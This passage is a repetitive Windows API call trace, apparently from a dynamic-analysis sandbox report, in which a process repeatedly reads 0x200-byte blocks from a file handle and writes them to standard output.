nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.627] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.628] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.630] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.631] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.632] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType (hFile=0x4c) returned 0x1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType (hFile=0x4c) returned 0x1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType (hFile=0x4c) returned 0x1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType (hFile=0x4c) returned 0x1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType (hFile=0x4c) returned 0x1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType (hFile=0x4c) returned 0x1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType (hFile=0x4c) returned 0x1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType (hFile=0x4c) returned 0x1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.633] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.633] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.634] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.635] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 